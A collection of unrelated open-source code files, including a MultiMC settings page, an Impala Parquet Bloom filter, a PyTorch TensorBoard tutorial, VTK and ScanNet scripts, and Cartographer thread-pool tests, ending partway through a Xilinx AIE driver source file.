/* Copyright 2013-2021 MultiMC Contributors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "PasteEEPage.h" #include "ui_PasteEEPage.h" #include <QMessageBox> #include <QFileDialog> #include <QStandardPaths> #include <QTabBar> #include "settings/SettingsObject.h" #include "tools/BaseProfiler.h" #include "Application.h" PasteEEPage::PasteEEPage(QWidget *parent) : QWidget(parent), ui(new Ui::PasteEEPage) { ui->setupUi(this); ui->tabWidget->tabBar()->hide();\ connect(ui->customAPIkeyEdit, &QLineEdit::textEdited, this, &PasteEEPage::textEdited); loadSettings(); } PasteEEPage::~PasteEEPage() { delete ui; } void PasteEEPage::loadSettings() { auto s = APPLICATION->settings(); QString keyToUse = s->get("PasteEEAPIKey").toString(); if(keyToUse == "multimc") { ui->multimcButton->setChecked(true); } else { ui->customButton->setChecked(true); ui->customAPIkeyEdit->setText(keyToUse); } } void PasteEEPage::applySettings() { auto s = APPLICATION->settings(); QString pasteKeyToUse; if (ui->customButton->isChecked()) pasteKeyToUse = ui->customAPIkeyEdit->text(); else { pasteKeyToUse = "multimc"; } s->set("PasteEEAPIKey", pasteKeyToUse); } bool PasteEEPage::apply() { applySettings(); return true; } void PasteEEPage::textEdited(const QString& text) { ui->customButton->setChecked(true); }
// Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // This file is partially a copy of Kudu BlockBloomFilter code. We wanted to reuse the // existing implementation but also extend/modify some parts. This would not have been // possible without modifying the Kudu source code in Impala // (be/src/kudu/util/block_bloom_filter*). On the other hand, we have to maintain binary // compatibility between the the Kudu code in Impala and actual Kudu code, so we decided // against modifying the code in be/src/kudu/util/block_bloom_filter*. #include "parquet-bloom-filter.h" #ifdef __aarch64__ #include "sse2neon.h" #else #include <immintrin.h> #include <mm_malloc.h> #endif #include <cmath> #include <cstdint> #include "gutil/strings/substitute.h" #include "util/cpu-info.h" #include "thirdparty/xxhash/xxhash.h" using namespace std; using strings::Substitute; // TODO: Reconcile with legacy AVX support. DEFINE_bool(disable_parquetbloomfilter_avx2, false, "Disable AVX2 operations in ParquetBloomFilter. This flag has no effect if the " "target CPU doesn't support AVX2 at run-time or ParquetBloomFilter was built with " "a compiler that doesn't support AVX2."); DECLARE_bool(enable_legacy_avx_support); namespace impala { // This is needed to avoid undefined reference errors. constexpr uint64_t ParquetBloomFilter::MAX_BYTES; constexpr uint64_t ParquetBloomFilter::MIN_BYTES; constexpr uint32_t ParquetBloomFilter::SALT[8] __attribute__((aligned(32))); ParquetBloomFilter::ParquetBloomFilter() : log_num_buckets_(0), directory_mask_(0), directory_(nullptr), always_false_(false) { #ifdef USE_AVX2 if (has_avx2()) { bucket_insert_func_ptr_ = &ParquetBloomFilter::BucketInsertAVX2; bucket_find_func_ptr_ = &ParquetBloomFilter::BucketFindAVX2; } else { bucket_insert_func_ptr_ = &ParquetBloomFilter::BucketInsert; bucket_find_func_ptr_ = &ParquetBloomFilter::BucketFind; } #else bucket_insert_func_ptr_ = &ParquetBloomFilter::BucketInsert; bucket_find_func_ptr_ = &ParquetBloomFilter::BucketFind; #endif DCHECK(bucket_insert_func_ptr_); DCHECK(bucket_find_func_ptr_); } ParquetBloomFilter::~ParquetBloomFilter() {} Status ParquetBloomFilter::Init(uint8_t* directory, size_t dir_size, bool always_false) { const int log_space_bytes = std::log2(dir_size); DCHECK_EQ(1ULL << log_space_bytes, dir_size); // Since log_space_bytes is in bytes, we need to convert it to the number of tiny // Bloom filters we will use. log_num_buckets_ = std::max(1, log_space_bytes - kLogBucketByteSize); // Since we use 32 bits in the arguments of Insert() and Find(), log_num_buckets_ // must be limited. if (log_num_buckets_ > 32) { return Status(Substitute("Parquet Bloom filter too large. 
log_space_bytes: $0", log_space_bytes)); } DCHECK_EQ(directory_size(), dir_size); DCHECK(directory != nullptr); directory_ = reinterpret_cast<Bucket*>(directory); if (always_false) { // Check the assumption that the directory is empty. DCHECK(std::all_of(directory, directory + dir_size, [](uint8_t byte) { return byte == 0; })); always_false_ = true; } // Don't use log_num_buckets_ if it will lead to undefined behavior by a shift // that is too large. directory_mask_ = (1ULL << log_num_buckets_) - 1; return Status::OK(); } void ParquetBloomFilter::Insert(const uint64_t hash) noexcept { always_false_ = false; uint32_t idx = DetermineBucketIdx(hash); uint32_t hash_lower = hash; DCHECK(bucket_insert_func_ptr_); (this->*bucket_insert_func_ptr_)(idx, hash_lower); } void ParquetBloomFilter::HashAndInsert(const uint8_t* input, size_t size) noexcept { const uint64_t hash = Hash(input, size); Insert(hash); } bool ParquetBloomFilter::Find(const uint64_t hash) const noexcept { if (always_false_) return false; uint32_t idx = DetermineBucketIdx(hash); uint32_t hash_lower = hash; DCHECK(bucket_find_func_ptr_); return (this->*bucket_find_func_ptr_)(idx, hash_lower); } bool ParquetBloomFilter::HashAndFind(const uint8_t* input, size_t size) const noexcept { const uint64_t hash = Hash(input, size); return Find(hash); } int ParquetBloomFilter::OptimalByteSize(const size_t ndv, const double fpp) { DCHECK(fpp > 0.0 && fpp < 1.0) << "False positive probability should be less than 1.0 and greater than 0.0"; const int min_log_space = MinLogSpace(ndv, fpp); const int min_space = std::pow(2, min_log_space); if (min_space < MIN_BYTES) return MIN_BYTES; if (min_space > MAX_BYTES) return MAX_BYTES; return min_space; } int ParquetBloomFilter::MinLogSpace(const size_t ndv, const double fpp) { static const double k = kBucketWords; if (0 == ndv) return 0; // m is the number of bits we would need to get the fpp specified const double m = -k * ndv / log(1 - pow(fpp, 1.0 / k)); // Handle case where ndv == 1 => ceil(log2(m/8)) < 0. return std::max(0, static_cast<int>(ceil(log2(m / 8)))); } double ParquetBloomFilter::FalsePositiveProb(const size_t ndv, const int log_space_bytes) { return pow(1 - exp((-1.0 * static_cast<double>(kBucketWords) * static_cast<double>(ndv)) / static_cast<double>(1ULL << (log_space_bytes + 3))), kBucketWords); } uint64_t ParquetBloomFilter::Hash(const uint8_t* input, size_t size) { static_assert(std::is_same<XXH64_hash_t, uint64_t>::value, "XXHash should return a 64 bit integer."); XXH64_hash_t hash = XXH64(input, size, 0 /* seed */); return hash; } ATTRIBUTE_NO_SANITIZE_INTEGER void ParquetBloomFilter::BucketInsert(const uint32_t bucket_idx, const uint32_t hash) noexcept { // new_bucket will be all zeros except for eight 1-bits, one in each 32-bit word. It is // 16-byte aligned so it can be read as a __m128i using aligned SIMD loads in the second // part of this method. uint32_t new_bucket[kBucketWords] __attribute__((aligned(16))); for (int i = 0; i < kBucketWords; ++i) { // Rehash 'hash' and use the top kLogBucketWordBits bits, following Dietzfelbinger. 
new_bucket[i] = (SALT[i] * hash) >> ((1 << kLogBucketWordBits) - kLogBucketWordBits); new_bucket[i] = 1U << new_bucket[i]; } for (int i = 0; i < 2; ++i) { __m128i new_bucket_sse = _mm_load_si128( reinterpret_cast<__m128i*>(new_bucket + 4 * i)); __m128i* existing_bucket = reinterpret_cast<__m128i*>( &DCHECK_NOTNULL(directory_)[bucket_idx][4 * i]); *existing_bucket = _mm_or_si128(*existing_bucket, new_bucket_sse); } } ATTRIBUTE_NO_SANITIZE_INTEGER bool ParquetBloomFilter::BucketFind( const uint32_t bucket_idx, const uint32_t hash) const noexcept { for (int i = 0; i < kBucketWords; ++i) { BucketWord hval = (SALT[i] * hash) >> ( (1 << kLogBucketWordBits) - kLogBucketWordBits); hval = 1U << hval; if (!(DCHECK_NOTNULL(directory_)[bucket_idx][i] & hval)) { return false; } } return true; } bool ParquetBloomFilter::has_avx2() { return !FLAGS_disable_parquetbloomfilter_avx2 && !FLAGS_enable_legacy_avx_support && CpuInfo::IsSupported(CpuInfo::AVX2); } } // namespace impala
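# A quick sanity check of the sizing math above: MinLogSpace() and
# FalsePositiveProb() implement the standard block Bloom filter formulas, and
# the same arithmetic can be reproduced directly. This is an illustrative
# Python sketch, not part of the Impala sources; ndv and fpp are arbitrary and
# k is the eight 32-bit words per bucket (kBucketWords) used above.
import math

k = 8.0
ndv = 100_000   # assumed number of distinct values
fpp = 0.01      # assumed target false positive probability

m = -k * ndv / math.log(1 - fpp ** (1.0 / k))           # bits needed for target fpp
log_space_bytes = max(0, math.ceil(math.log2(m / 8)))   # directory size rounded up to a power of two
achieved = (1 - math.exp(-k * ndv / 2 ** (log_space_bytes + 3))) ** k

print(f"directory: {1 << log_space_bytes} bytes, achieved fpp ~ {achieved:.4f}")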
<filename>seleniumwire/thirdparty/mitmproxy/command_lexer.py import ast import re import pyparsing # TODO: There is a lot of work to be done here. # The current implementation is written in a way that _any_ input is valid, # which does not make sense once things get more complex. PartialQuotedString = pyparsing.Regex( re.compile( r''' (["']) # start quote (?: (?:\\.) # escape sequence | (?!\1). # unescaped character that is not our quote nor the begin of an escape sequence. We can't use \1 in [] )* (?:\1|$) # end quote ''', re.VERBOSE ) ) expr = pyparsing.ZeroOrMore( PartialQuotedString | pyparsing.Word(" \r\n\t") | pyparsing.CharsNotIn("""'" \r\n\t""") ).leaveWhitespace() def quote(val: str) -> str: if val and all(char not in val for char in "'\" \r\n\t"): return val return repr(val) # TODO: More of a hack. def unquote(x: str) -> str: quoted = ( (x.startswith('"') and x.endswith('"')) or (x.startswith("'") and x.endswith("'")) ) if quoted: try: x = ast.literal_eval(x) except Exception: x = x[1:-1] return x
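# Illustrative usage of quote()/unquote() above (a sketch appended for clarity,
# not part of the original module; it assumes these lines live in the same
# module so both helpers are in scope):
if __name__ == "__main__":
    assert quote("simple") == "simple"            # nothing needs escaping
    assert quote("two words") == "'two words'"    # repr() supplies the quotes
    assert unquote("'two words'") == "two words"  # literal_eval strips them again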
""" How to use TensorBoard with PyTorch =================================== TensorBoard is a visualization toolkit for machine learning experimentation. TensorBoard allows tracking and visualizing metrics such as loss and accuracy, visualizing the model graph, viewing histograms, displaying images and much more. In this tutorial we are going to cover TensorBoard installation, basic usage with PyTorch, and how to visualize data you logged in TensorBoard UI. Installation ---------------------- PyTorch should be installed to log models and metrics into TensorBoard log directory. The following command will install PyTorch 1.4+ via Anaconda (recommended): :: $ conda install pytorch torchvision -c pytorch or pip :: $ pip install torch torchvision """ ###################################################################### # Using TensorBoard in PyTorch # ----- # # Let’s now try using TensorBoard with PyTorch! Before logging anything, # we need to create a ``SummaryWriter`` instance. # import torch from torch.utils.tensorboard import SummaryWriter writer = SummaryWriter() ###################################################################### # Writer will output to ``./runs/`` directory by default. # ###################################################################### # Log scalars # ----- # # In machine learning, it’s important to understand key metrics such as # loss and how they change during training. Scalar helps to save # the loss value of each training step, or the accuracy after each epoch. # # To log a scalar value, use # ``add_scalar(tag, scalar_value, global_step=None, walltime=None)``. # For example, lets create a simple linear regression training, and # log loss value using ``add_scalar`` # x = torch.arange(-5, 5, 0.1).view(-1, 1) y = -5 * x + 0.1 * torch.randn(x.size()) model = torch.nn.Linear(1, 1) criterion = torch.nn.MSELoss() optimizer = torch.optim.SGD(model.parameters(), lr = 0.1) def train_model(iter): for epoch in range(iter): y1 = model(x) loss = criterion(y1, y) writer.add_scalar("Loss/train", loss, epoch) optimizer.zero_grad() loss.backward() optimizer.step() train_model(10) writer.flush() ###################################################################### # Call ``flush()`` method to make sure that all pending events # have been written to disk. # # See `torch.utils.tensorboard tutorials <https://pytorch.org/docs/stable/tensorboard.html>`_ # to find more TensorBoard visualization types you can log. # # If you do not need the summary writer anymore, call ``close()`` method. # writer.close() ###################################################################### # Run TensorBoard # ----- # # Install TensorBoard through the command line to visualize data you logged # # :: # # $ pip install tensorboard # # # Now, start TensorBoard, specifying the root log directory you used above. # Argument ``logdir`` points to directory where TensorBoard will look to find # event files that it can display. TensorBoard will recursively walk # the directory structure rooted at logdir, looking for .*tfevents.* files. # # :: # # $ tensorboard --logdir=runs # # Go to the URL it provides OR to `http://localhost:6006/ <http://localhost:6006/>`_ # # .. image:: ../../_static/img/thumbnails/tensorboard_scalars.png # :scale: 40 % # # This dashboard shows how the loss and accuracy change with every epoch. # You can use it to also track training speed, learning rate, and other # scalar values. It’s helpful to compare these metrics across different # training runs to improve your model. 
# ###################################################################### # Share TensorBoard dashboards # ----- # # `TensorBoard.dev <https://tensorboard.dev/>`_ lets you upload and share # your ML experiment results with anyone. Use TensorBoard.dev to host, # track, and share your TensorBoard dashboards. # # Install the latest version of TensorBoard to use the uploader. # # :: # # $ pip install tensorboard --upgrade # # Use a simple command to upload and share your TensorBoard. # # :: # # $ tensorboard dev upload --logdir runs \ # --name "My latest experiment" \ # optional # --description "Simple comparison of several hyperparameters" # optional # # For help, run ``$ tensorboard dev --help``. # # **Note:** Uploaded TensorBoards are public and visible to everyone. # Do not upload sensitive data. # # View your TensorBoard live at URL provided in your terminal. # E.g. `https://tensorboard.dev/experiment/AdYd1TgeTlaLWXx6I8JUbA <https://tensorboard.dev/experiment/AdYd1TgeTlaLWXx6I8JUbA>`_ # # # .. image:: ../../_static/img/thumbnails/tensorboard_dev.png # :scale: 40 % # # # .. note:: # TensorBoard.dev currently supports scalars, graphs, histograms, distributions, hparams, and text dashboards. ######################################################################## # Learn More # ---------------------------- # # - `torch.utils.tensorboard <https://pytorch.org/docs/stable/tensorboard.html>`_ docs # - `Visualizing models, data, and training with TensorBoard <https://pytorch.org/tutorials/intermediate/tensorboard_tutorial.html>`_ tutorial #
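######################################################################
# Log related scalars together
# -----
#
# A minimal illustrative sketch (not part of the original tutorial): grouping
# related values, such as training and validation loss, into one chart with
# ``add_scalars``. The loss values below are placeholders.
#

from torch.utils.tensorboard import SummaryWriter

writer = SummaryWriter()
for epoch in range(10):
    train_loss = 1.0 / (epoch + 1)   # placeholder value
    val_loss = 1.2 / (epoch + 1)     # placeholder value
    writer.add_scalars("Loss", {"train": train_loss, "validation": val_loss}, epoch)
writer.flush()
writer.close()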
<filename>data_conversions/prepare_scannet_cls_data.py<gh_stars>1000+ #!/usr/bin/python3 '''Convert ScanNet pts to h5.''' from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import h5py import argparse import numpy as np from datetime import datetime def main(): parser = argparse.ArgumentParser() parser.add_argument('--folder', '-f', help='Path to data folder') args = parser.parse_args() print(args) batch_size = 2048 sample_num = 2048 folder_scanenet = args.folder if args.folder else '../../data/scannet/cls' train_test_folders = ['train', 'test'] label_list = [] for folder in train_test_folders: folder_pts = os.path.join(folder_scanenet, folder, 'pts') for filename in os.listdir(folder_pts): label_list.append(int(filename[:-4].split('_')[-1])) label_list = sorted(set(label_list)) print('label_num:', len(label_list)) label_dict = dict() for idx, label in enumerate(label_list): label_dict[label] = idx data = np.zeros((batch_size, sample_num, 6)) label = np.zeros((batch_size), dtype=np.int32) for folder in train_test_folders: folder_pts = os.path.join(folder_scanenet, folder, 'pts') idx_h5 = 0 filename_filelist_h5 = os.path.join(folder_scanenet, '%s_files.txt' % folder) with open(filename_filelist_h5, 'w') as filelist_h5: filelist = os.listdir(folder_pts) for idx_pts, filename in enumerate(filelist): label_object = label_dict[int(filename[:-4].split('_')[-1])] filename_pts = os.path.join(folder_pts, filename) xyzrgbs = np.array([[float(value) for value in xyzrgb.split(' ')] for xyzrgb in open(filename_pts, 'r') if len(xyzrgb.split(' ')) == 6]) np.random.shuffle(xyzrgbs) pt_num = xyzrgbs.shape[0] indices = np.random.choice(pt_num, sample_num, replace=(pt_num < sample_num)) points_array = xyzrgbs[indices] points_array[..., 3:] = points_array[..., 3:]/255 - 0.5 # normalize colors idx_in_batch = idx_pts % batch_size data[idx_in_batch, ...] = points_array label[idx_in_batch] = label_object if ((idx_pts + 1) % batch_size == 0) or idx_pts == len(filelist) - 1: item_num = idx_in_batch + 1 filename_h5 = os.path.join(folder_scanenet, '%s_%d.h5' % (folder, idx_h5)) print('{}-Saving {}...'.format(datetime.now(), filename_h5)) filelist_h5.write('./%s_%d.h5\n' % (folder, idx_h5)) file = h5py.File(filename_h5, 'w') file.create_dataset('data', data=data[0:item_num, ...]) file.create_dataset('label', data=label[0:item_num, ...]) file.close() idx_h5 = idx_h5 + 1 if __name__ == '__main__': main()
#!/usr/bin/env python import vtk def main(): fileName = get_program_parameters() colors = vtk.vtkNamedColors() # Create the RenderWindow, Renderer and Interactor. # ren1 = vtk.vtkRenderer() renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren1) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) # Create the pipeline. # reader = vtk.vtkMetaImageReader() reader.SetFileName(fileName) reader.Update() extractVOI = vtk.vtkExtractVOI() extractVOI.SetInputConnection(reader.GetOutputPort()) extractVOI.SetVOI(0, 255, 0, 255, 45, 45) iso = vtk.vtkContourFilter() iso.SetInputConnection(extractVOI.GetOutputPort()) iso.GenerateValues(12, 500, 1150) isoMapper = vtk.vtkPolyDataMapper() isoMapper.SetInputConnection(iso.GetOutputPort()) isoMapper.ScalarVisibilityOff() isoActor = vtk.vtkActor() isoActor.SetMapper(isoMapper) isoActor.GetProperty().SetColor(colors.GetColor3d("Wheat")) outline = vtk.vtkOutlineFilter() outline.SetInputConnection(extractVOI.GetOutputPort()) outlineMapper = vtk.vtkPolyDataMapper() outlineMapper.SetInputConnection(outline.GetOutputPort()) outlineActor = vtk.vtkActor() outlineActor.SetMapper(outlineMapper) # Add the actors to the renderer, set the background and size. # ren1.AddActor(outlineActor) ren1.AddActor(isoActor) ren1.SetBackground(colors.GetColor3d("SlateGray")) ren1.ResetCamera() ren1.GetActiveCamera().Dolly(1.5) ren1.ResetCameraClippingRange() renWin.SetSize(640, 480) renWin.Render() iren.Start() def get_program_parameters(): import argparse description = 'Marching squares are used to generate contour lines.' epilogue = ''' ''' parser = argparse.ArgumentParser(description=description, epilog=epilogue, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument('filename', help='FullHead.mhd.') args = parser.parse_args() return args.filename if __name__ == '__main__': main()
#include "ChromeDevTools.h" #include <V8JsiRuntime.h> #include <Babylon/JsRuntime.h> namespace Babylon::Plugins { class ChromeDevTools::Impl final : public std::enable_shared_from_this<ChromeDevTools::Impl> { public: explicit Impl(Napi::Env env) : m_env(env) { JsRuntime::GetFromJavaScript(env).Dispatch([this](Napi::Env env) { m_runtime = JsRuntime::NativeObject::GetFromJavaScript(env).Get("_JSIRuntime").As<Napi::External<facebook::jsi::Runtime>>().Data(); }); } ~Impl() { } bool SupportsInspector() { return true; } void StartInspector(const unsigned short, const std::string&) { JsRuntime::GetFromJavaScript(m_env).Dispatch([this](Napi::Env) { if (m_runtime != nullptr) { v8runtime::openInspector(*m_runtime); } }); } void StopInspector() { } private: facebook::jsi::Runtime* m_runtime; Napi::Env m_env; }; ChromeDevTools ChromeDevTools::Initialize(Napi::Env env) { return {std::make_shared<ChromeDevTools::Impl>(env)}; } ChromeDevTools::ChromeDevTools(std::shared_ptr<ChromeDevTools::Impl> impl) : m_impl{std::move(impl)} { } bool ChromeDevTools::SupportsInspector() const { return m_impl->SupportsInspector(); } /* Note: V8JSI doesn't currently support setting the port or appName at runtime. For now the port is set to 5643 in AppRuntimeJSI.cpp. */ void ChromeDevTools::StartInspector(const unsigned short port, const std::string& appName) const { m_impl->StartInspector(port, appName); } /* Note: V8JSI doesn't currently have a method for stopping the inspector at runtime. */ void ChromeDevTools::StopInspector() const { m_impl->StopInspector(); } }
/* * Copyright 2018 The Cartographer Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include "cartographer/common/thread_pool.h" #include <vector> #include "absl/memory/memory.h" #include "gtest/gtest.h" namespace cartographer { namespace common { namespace { class Receiver { public: void Receive(int number) { absl::MutexLock locker(&mutex_); received_numbers_.push_back(number); } void WaitForNumberSequence(const std::vector<int>& expected_numbers) { const auto predicate = [this, &expected_numbers]() EXCLUSIVE_LOCKS_REQUIRED(mutex_) { return (received_numbers_.size() >= expected_numbers.size()); }; absl::MutexLock locker(&mutex_); mutex_.Await(absl::Condition(&predicate)); EXPECT_EQ(expected_numbers, received_numbers_); } absl::Mutex mutex_; std::vector<int> received_numbers_ GUARDED_BY(mutex_); }; TEST(ThreadPoolTest, RunTask) { ThreadPool pool(1); Receiver receiver; auto task = absl::make_unique<Task>(); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); pool.Schedule(std::move(task)); receiver.WaitForNumberSequence({1}); } TEST(ThreadPoolTest, ManyTasks) { for (int a = 0; a < 5; ++a) { ThreadPool pool(3); Receiver receiver; int kNumTasks = 10; for (int i = 0; i < kNumTasks; ++i) { auto task = absl::make_unique<Task>(); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); pool.Schedule(std::move(task)); } receiver.WaitForNumberSequence(std::vector<int>(kNumTasks, 1)); } } TEST(ThreadPoolTest, RunWithDependency) { ThreadPool pool(2); Receiver receiver; auto task_2 = absl::make_unique<Task>(); task_2->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2->AddDependency(weak_task_1); pool.Schedule(std::move(task_2)); receiver.WaitForNumberSequence({1, 2}); } TEST(ThreadPoolTest, RunWithOutOfScopeDependency) { ThreadPool pool(2); Receiver receiver; auto task_2 = absl::make_unique<Task>(); task_2->SetWorkItem([&receiver]() { receiver.Receive(2); }); { auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2->AddDependency(weak_task_1); } pool.Schedule(std::move(task_2)); receiver.WaitForNumberSequence({1, 2}); } TEST(ThreadPoolTest, ManyDependencies) { for (int a = 0; a < 5; ++a) { ThreadPool pool(5); Receiver receiver; int kNumDependencies = 10; auto task = absl::make_unique<Task>(); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); for (int i = 0; i < kNumDependencies; ++i) { auto dependency_task = absl::make_unique<Task>(); dependency_task->SetWorkItem([]() {}); task->AddDependency(pool.Schedule(std::move(dependency_task))); } pool.Schedule(std::move(task)); receiver.WaitForNumberSequence({1}); } } TEST(ThreadPoolTest, ManyDependants) { for (int a = 0; a < 5; ++a) { ThreadPool pool(5); Receiver receiver; int kNumDependants = 10; auto dependency_task = absl::make_unique<Task>(); 
dependency_task->SetWorkItem([]() {}); auto dependency_handle = pool.Schedule(std::move(dependency_task)); for (int i = 0; i < kNumDependants; ++i) { auto task = absl::make_unique<Task>(); task->AddDependency(dependency_handle); task->SetWorkItem([&receiver]() { receiver.Receive(1); }); pool.Schedule(std::move(task)); } receiver.WaitForNumberSequence(std::vector<int>(kNumDependants, 1)); } } TEST(ThreadPoolTest, RunWithMultipleDependencies) { ThreadPool pool(2); Receiver receiver; auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto task_2a = absl::make_unique<Task>(); task_2a->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto task_2b = absl::make_unique<Task>(); task_2b->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto task_3 = absl::make_unique<Task>(); task_3->SetWorkItem([&receiver]() { receiver.Receive(3); }); /* -> task_2a \ * task_1 /-> task_2b --> task_3 */ auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2a->AddDependency(weak_task_1); auto weak_task_2a = pool.Schedule(std::move(task_2a)); task_3->AddDependency(weak_task_1); task_3->AddDependency(weak_task_2a); task_2b->AddDependency(weak_task_1); auto weak_task_2b = pool.Schedule(std::move(task_2b)); task_3->AddDependency(weak_task_2b); pool.Schedule(std::move(task_3)); receiver.WaitForNumberSequence({1, 2, 2, 3}); } TEST(ThreadPoolTest, RunWithFinishedDependency) { ThreadPool pool(2); Receiver receiver; auto task_1 = absl::make_unique<Task>(); task_1->SetWorkItem([&receiver]() { receiver.Receive(1); }); auto task_2 = absl::make_unique<Task>(); task_2->SetWorkItem([&receiver]() { receiver.Receive(2); }); auto weak_task_1 = pool.Schedule(std::move(task_1)); task_2->AddDependency(weak_task_1); receiver.WaitForNumberSequence({1}); pool.Schedule(std::move(task_2)); receiver.WaitForNumberSequence({1, 2}); } } // namespace } // namespace common } // namespace cartographer
/****************************************************************************** * Copyright (C) 2018 - 2020 Xilinx, Inc. All rights reserved. * SPDX-License-Identifier: MIT ******************************************************************************/ /*****************************************************************************/ /** * @file xaielib.c * @{ * * This file contains the low level layer interface of the AIE driver with the * definitions for the memory write and read operations. * * <pre> * MODIFICATION HISTORY: * * Ver Who Date Changes * ----- ------ -------- ----------------------------------------------------- * 1.0 Naresh 03/23/2018 Initial creation * 1.1 Naresh 05/23/2018 Added bare-metal BSP support * 1.2 Naresh 06/18/2018 Updated code as per standalone driver framework * 1.3 Naresh 07/11/2018 Updated copyright info * 1.4 Hyun 10/10/2018 Added the mask write API * 1.5 Hyun 10/11/2018 Don't include the xaieio header for sim build * 1.6 Hyun 10/16/2018 Added the baremetal compile switch everywhere * it's needed * 1.7 Hyun 11/14/2018 Move platform dependent code to xaielib.c * 1.8 Nishad 12/05/2018 Renamed ME attributes to AIE * 1.9 Hyun 01/08/2019 Implement 128bit IO operations for baremetal * 2.0 Hyun 01/08/2019 Add XAieLib_MaskPoll() * 2.1 Hyun 04/05/2019 NPI support for simulation * 2.2 Nishad 05/16/2019 Fix deallocation of pointer not on heap MISRA-c * mandatory violation * 2.3 Nishad 08/07/2019 Remove OS specific gaurd from XAieLib_usleep API * 2.4 Hyun 09/13/2019 Use the simulation elf loader function * 2.5 Hyun 09/13/2019 Use XAieSim_LoadElfMem() * 2.6 Tejus 10/14/2019 Enable assertion for linux and simulation * 2.7 Wendy 02/25/2020 Add logging API * 2.8 Tejus 04/17/2020 Fix variable overflow issue. * </pre> * ******************************************************************************/ #include "xaiegbl_defs.h" #include "xaielib.h" #include "xaielib_npi.h" #include <stdarg.h> #include <stdio.h> #include <string.h> #ifdef __AIESIM__ /* AIE simulator */ #include <assert.h> #include <errno.h> #include "xaiesim.h" #elif defined __AIEBAREMTL__ /* Bare-metal application */ #include "xil_types.h" #include "xil_io.h" #include "xil_assert.h" #include "xil_exception.h" #include "xil_printf.h" #include "xil_cache.h" #include "xstatus.h" #include "sleep.h" #include <stdlib.h> #else /* Non-baremetal application, ex Linux */ #include <assert.h> #include <errno.h> #include <unistd.h> #include "xaieio.h" #include "xaietile_proc.h" #include "xaiesim.h" #include "xaiesim_elfload.h" #endif /***************************** Include Files *********************************/ /***************************** Macro Definitions *****************************/ /* * Default heap size in baremetal bsp is 0x2000. Use half of it unless * specified. */ #ifndef XAIELIB_BAREMTL_DEF_MEM_SIZE #define XAIELIB_BAREMTL_DEF_MEM_SIZE (0x1000) #endif /* Address should be aligned at 128 bit / 16 bytes */ #define XAIELIB_SHIM_MEM_ALIGN 16 /************************** Variable Definitions *****************************/ typedef struct XAieLib_MemInst { u64 Size; /**< Size */ u64 Vaddr; /**< Virtual address */ u64 Paddr; /**< Device / physical address */ void *Platform; /**< Platform specific data */ } XAieLib_MemInst; #ifdef __linux__ static FILE *XAieLib_LogFPtr; /**< Pointer to Log file pointer. */ #endif /************************** Function Definitions *****************************/ /*****************************************************************************/ /** * * This asserts if the condition doesn't meet. 
* * @param Cond: Condition to meet. Should be 0 or 1. * * @return 0 * * @note None. * *******************************************************************************/ u32 XAieLib_AssertNonvoid(u8 Cond, const char *func, const u32 line) { if(!Cond) XAieLib_print("Assert: %s, line %d\n", func, line); #ifdef __AIEBAREMTL__ Xil_AssertNonvoid(Cond); #else assert(Cond); #endif return 0; } /*****************************************************************************/ /** * * This asserts if the condition doesn't meet. Can be used for void return * function. * * @param Cond: Condition to meet. Should be 0 or 1. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_AssertVoid(u8 Cond, const char *func, const u32 line) { if(!Cond) XAieLib_print("Assert: %s, line %d\n", func, line); #ifdef __AIEBAREMTL__ Xil_AssertVoid(Cond); #else assert(Cond); #endif } /*****************************************************************************/ /** * * This provides to sleep in micro seconds. * * @param Usec: Micro seconds to sleep * * @return 0 for success, and -1 for error.. * * @note None. * *******************************************************************************/ int XAieLib_usleep(u64 Usec) { #ifdef __AIESIM__ return XAieSim_usleep(Usec); #else /** * FIXME: Platform implementation of usleep() API, returns void when it * is expected to return SUCCESS/FAILURE code. Instead of returning a * zero, this API must return SUCCESS/FAILURE code when usleep API is * fixed. */ usleep(Usec); return 0; #endif } /*****************************************************************************/ /** * * This API loads the elf to corresponding tile * * @param TileInstPtr: Tile instance for the elf to be loaded * @param ElfPtr: path to the elf file * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note None. * *******************************************************************************/ u32 XAieLib_LoadElf(XAieGbl_Tile *TileInstPtr, u8 *ElfPtr, u8 LoadSym) { #ifdef __AIESIM__ return XAieSim_LoadElf(TileInstPtr, ElfPtr, LoadSym); #elif defined __AIEBAREMTL__ return XAIELIB_FAILURE; #else /* Use the simulation elf load to 